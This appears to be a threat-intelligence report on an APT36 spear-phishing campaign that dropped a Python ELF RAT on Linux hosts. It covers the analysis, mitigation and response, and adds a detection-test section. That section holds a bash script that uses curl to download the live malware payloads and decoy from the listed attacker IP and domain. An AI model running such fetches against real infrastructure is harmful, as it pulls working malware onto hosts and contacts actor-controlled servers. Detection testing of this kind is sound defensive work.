APT36 Deploys Python ELF Malware Against Indian Government Entities

Summary

APT36 (Transparent Tribe) ran a spear-phishing campaign that dropped malicious Linux .desktop shortcut files on Indian government users. These launchers retrieve and run a Python-based ELF RAT named swcbc from an attacker-controlled server. The malware maintains persistence through a user-level systemd service and communicates with its C2 over HTTP to exfiltrate data and execute commands. The campaign underscores the group’s growing ability to operate effectively in Linux environments.

Investigation

The investigation followed the chain from the initial .zip attachment to the .desktop launcher, the decoy PDF, and the two payloads (swcbc ELF binary and swcbc.sh script) downloaded from an actor-controlled IP address. Analysis showed the ELF binary is a PyInstaller-packed Python RAT with capabilities for system profiling, file upload/download, screen capture, and self-removal. Persistence is implemented by registering a systemd service inside the user’s configuration directory.

Mitigation

Recommended defenses include blocking execution of .desktop, .sh, and ELF binaries received via email and enforcing sandbox execution for suspicious attachments. Disable automatic execution from world-writable paths like /tmp and apply noexec mount options where possible. Monitor DNS and HTTP traffic for connections to the identified malicious domain and IP. Enforce strict application control on tools such as curl and LibreOffice.

Response

When activity is detected, isolate the impacted Linux host, collect the malicious artifacts and the systemd service unit, and remove the hidden ~/.swcbc directory. Use forensic tooling to extract the host’s unique identifier and terminate any ongoing C2 sessions. Update detection content with the observed IOCs and proactively hunt for similar patterns across the broader environment.

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.

• Attack Narrative & Commands:
  An APT‑36 operator hosts three payloads on compromised infrastructure and distributes their URLs via a phishing email. The victim, using a web browser configured to route traffic through the corporate proxy, clicks each link. The proxy logs each GET request, producing entries that match the rule’s url|all list. The payloads are:

  1. A raw ELF binary (swcbc) delivered over HTTP.
  2. A shell script (swcbc.sh) that, when executed, installs the ELF.
  3. A decoy PDF (Analysis_Proc_Report_Gem.pdf) intended to encourage the user to open the file while the malicious ELF runs in the background.

• Regression Test Script:

  #!/usr/bin/env bash
  # APT‑36 malicious URL download simulation – triggers the Sigma rule.
  set -euo pipefail
  
  # Define the malicious URLs (exact strings from the Sigma rule)
  urls=(
      "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc"
      "http://185.235.137.90:32587/uploads/yash10_52228826567/swcbc.sh"
      "https://lionsdenim.xyz/in/Analysis_Proc_Report_Gem.pdf"
  )
  
  # Download each payload through the corporate proxy.
  # Assume the environment variable http_proxy/https_proxy points to the proxy.
  for u in "${urls[@]}"; do
      echo "[*] Downloading $u via proxy..."
      curl -s -O "$u"
  done
  
  echo "[+] All malicious files downloaded. Check proxy logs for matching URLs."

  Save the script as apt36_simulation.sh, make it executable (chmod +x apt36_simulation.sh), and run it on the protected workstation.

• Cleanup Commands:

  #!/usr/bin/env bash
  # Remove all files created by the simulation
  rm -f swcbc swcbc.sh Analysis_Proc_Report_Gem.pdf
  echo "[+] Cleanup complete."